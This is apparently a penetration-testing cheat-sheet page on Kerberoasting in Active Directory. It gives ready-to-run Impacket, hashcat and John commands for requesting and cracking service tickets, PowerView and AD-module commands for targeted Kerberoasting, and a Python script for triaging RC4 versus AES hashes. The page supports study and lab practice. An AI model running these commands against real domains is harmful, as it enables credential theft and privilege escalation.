Kerberoasting

Typically, Kerberoasting happens after compromising a domain user. However, according to new research, it is also possible to perform this attack with an account susceptible to ASREPRoast (one that does not require Kerberos pre-authentication). For an example of this attack vector, check Rebound.

Kerberoasting is an attack on Service Tickets (STs) and Service Principal Names (SPNs). An SPN is a unique identifier that Kerberos uses to map a service instance, for example MySQL, to the account the service signs in with, such as svc_mysql; the service runs in that account's (often privileged) context. The ST is encrypted with a key derived from the service account's password (its NTLM hash when RC4 is used), so it can potentially be cracked offline. Any domain user can request an ST from the DC for any account that has an SPN.

Figure 1: The Kerberos authentication process (image taken from here).

Tools

Find and attack user accounts used as service accounts with Impacket:

sudo impacket-GetUserSPNs -request -dc-ip 192.168.50.70 <domain>/<user> -outputfile <fileName>

# Kerberoast an account susceptible to ASREPRoasting
sudo impacket-GetUserSPNs -no-preauth jjones -usersfile domain_users -dc-host 10.10.11.231 rebound.htb/ -outputfile kerb.txt

If time sync errors occur, i.e., KRB_AP_ERR_SKEW (Clock skew too great):

sudo ntpdate <dc-ip>

The krb5tgs hashes can be cracked offline using Hashcat or JtR:

# Crack the hashes using Hashcat
sudo hashcat -m 13100 hashes.kerberoast rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

# Crack the hashes using John the Ripper
.\john.exe --wordlist=<wordlist> hashes.kerberoast
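As an added example (not from the original page, Impacket or hashcat), a small Python triage script for the krb5tgs lines that impacket-GetUserSPNs writes: it parses the Impacket layout for RC4 (etype 23) and AES (etype 17/18) tickets, maps each to the hashcat mode that cracks it, and separates the RC4-keyed accounts, which are the ones to rotate and move to AES-only first. The sample hashes are constructed, not real tickets.

```python
# Triage of krb5tgs hashes from impacket-GetUserSPNs output: which service accounts
# were roasted with RC4 (fast to crack, hashcat -m 13100) versus AES (19600/19700).
import re
from dataclasses import dataclass

ETYPES = {23: ("RC4-HMAC", 13100), 17: ("AES128", 19600), 18: ("AES256", 19700)}
# etype 23 layout:    $krb5tgs$23$*user$REALM$spn*$checksum(16 bytes)$edata
RC4_RE = re.compile(r"^\$krb5tgs\$23\$\*([^$]+)\$([^$]+)\$([^*]+)\*\$([0-9a-f]{32})\$([0-9a-f]+)$", re.I)
# etype 17/18 layout: $krb5tgs$18$user$REALM$*spn*$checksum(12 bytes)$edata
AES_RE = re.compile(r"^\$krb5tgs\$(17|18)\$([^$]+)\$([^$]+)\$\*([^*]+)\*\$([0-9a-f]{24})\$([0-9a-f]+)$", re.I)

@dataclass
class RoastedTicket:
    user: str
    realm: str
    spn: str
    etype: int
    edata_bytes: int  # size of the encrypted ticket blob the cracker works on

    @property
    def weak(self) -> bool:  # RC4 key is the bare NT hash: cheapest to brute-force
        return self.etype == 23

    @property
    def hashcat_mode(self) -> int:
        return ETYPES[self.etype][1]

def parse_line(line: str):
    """Return a RoastedTicket for one krb5tgs line, or None if the line is not one."""
    line = line.strip()
    if m := RC4_RE.match(line):
        user, realm, spn, _cksum, edata = m.groups()
        return RoastedTicket(user, realm, spn.replace("~", ":"), 23, len(edata) // 2)
    if m := AES_RE.match(line):
        etype, user, realm, spn, _cksum, edata = m.groups()
        return RoastedTicket(user, realm, spn.replace("~", ":"), int(etype), len(edata) // 2)
    return None  # Impacket writes the ':' of an SPN port as '~'; undone above

def triage(lines):
    """Split into RC4-keyed tickets (rotate password, enforce AES) and AES-only tickets."""
    tickets = [t for t in map(parse_line, lines) if t]
    return [t for t in tickets if t.weak], [t for t in tickets if not t.weak]

# Constructed sample output (not real tickets): one RC4 hash, one AES256 hash, one stray line.
SAMPLE = [
    "$krb5tgs$23$*svc_mysql$CORP.LOCAL$MySQL/db01.corp.local~3306*$" + "0f" * 16 + "$" + "a1" * 64,
    "$krb5tgs$18$svc_web$CORP.LOCAL$*HTTP/web01.corp.local*$" + "0f" * 12 + "$" + "b2" * 64,
    "not a hash line",
]
```

Run triage(SAMPLE) and treat every account in the first list as a rotation candidate whose msDS-SupportedEncryptionTypes should be restricted to AES.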

Targeted Kerberoast

If we have GenericWrite or GenericAll on a user object, we can set an SPN on that user account, then request the service ticket (TGS) for it and crack it offline.

Set an SPN for the target user (it must be unique within the forest) using PowerView or the ActiveDirectory module:

# PowerView
Set-DomainObject -Identity <targetUser> -Set @{serviceprincipalname='<serviceName>/<randomString>'}

# AD module
Set-ADUser -Identity <targetUser> -ServicePrincipalNames @{Add='<serviceName>/<randomString>'}

Resources

  • An amazing demonstration of Kerberoasting (video)

  • What impacket-GetUserSPNs does behind the scenes (video)

  • Siegecast's lecture on Kerberoasting (video)

  • An in-depth adsecurity article about Kerberoasting (article)
